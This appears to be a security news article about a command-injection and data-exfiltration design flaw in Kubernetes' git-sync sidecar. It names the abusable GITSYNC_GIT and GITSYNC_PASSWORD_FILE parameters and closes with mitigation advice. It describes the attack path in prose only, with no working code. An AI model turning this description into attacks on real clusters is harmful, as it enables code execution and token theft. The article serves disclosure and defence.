Kubernetes Vulnerability Exposes Clusters to Command Injection Attacks


A recently discovered vulnerability in Kubernetes has raised significant concerns within the cybersecurity community. Akamai researcher Tomer Peled identified a design flaw in Kubernetes’ sidecar project, git-sync, which could allow attackers to execute command injection attacks.

This vulnerability affects default Kubernetes installations across various platforms, including Amazon EKS, Azure AKS, and Google GKE. It will be presented at DEF CON 2024.

EHA

The flaw lies in the git-sync project, a sidecar container used to synchronize a Kubernetes pod with a Git repository. This synchronization process, intended to automate updates, inadvertently introduces a large attack surface due to the lack of input sanitization.

Attackers can exploit this by applying a malicious YAML file to the cluster, a low-privilege operation, to execute arbitrary commands or exfiltrate data from the pod.

Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot

Two critical parameters, GITSYNC_GIT and GITSYNC_PASSWORD_FILE, are particularly vulnerable. GITSYNC_GIT allows the specification of a command to run, which can be replaced with a malicious binary for code execution.

Attack Vector

Meanwhile, GITSYNC_PASSWORD_FILE can be manipulated to exfiltrate sensitive information, such as access tokens, from the pod.

The vulnerability could lead to severe consequences, including unauthorized command execution and data theft. Attackers with minimal privileges could deploy a binary within a pod, disguised as git-sync, to execute commands under the guise of legitimate operations. This could bypass security measures and facilitate stealthy attacks, such as deploying cryptominers.

Moreover, attackers with edit privileges could redirect git-sync to send sensitive files to an external server, potentially compromising the entire Kubernetes cluster.

Despite the severity of the flaw, a CVE has not been assigned, and no official patch has been released. The Kubernetes team has acknowledged the issue but considers the required edit operations to be high-privilege, thus not warranting immediate remediation. However, the research highlights the need for increased awareness and monitoring of Kubernetes environments.

“This attack flow is especially dangerous in organizations that have pre-authorized git-sync communication in their cluster,” Tomer Peled said.

To mitigate risks, organizations are advised to enhance monitoring of outgoing communications from Kubernetes pods, particularly those using git-sync. Regular audits of git-sync pods are recommended to ensure they are executing expected commands.

Additionally, implementing Open Policy Agent (OPA) rules can help detect and block potential attack vectors by identifying unauthorized changes to git-sync configurations.

Are you from SOC and DFIR Teams? Analyse Malware Incidents & get live Access with ANY.RUN -> Get 14 Days Free Acces



Source link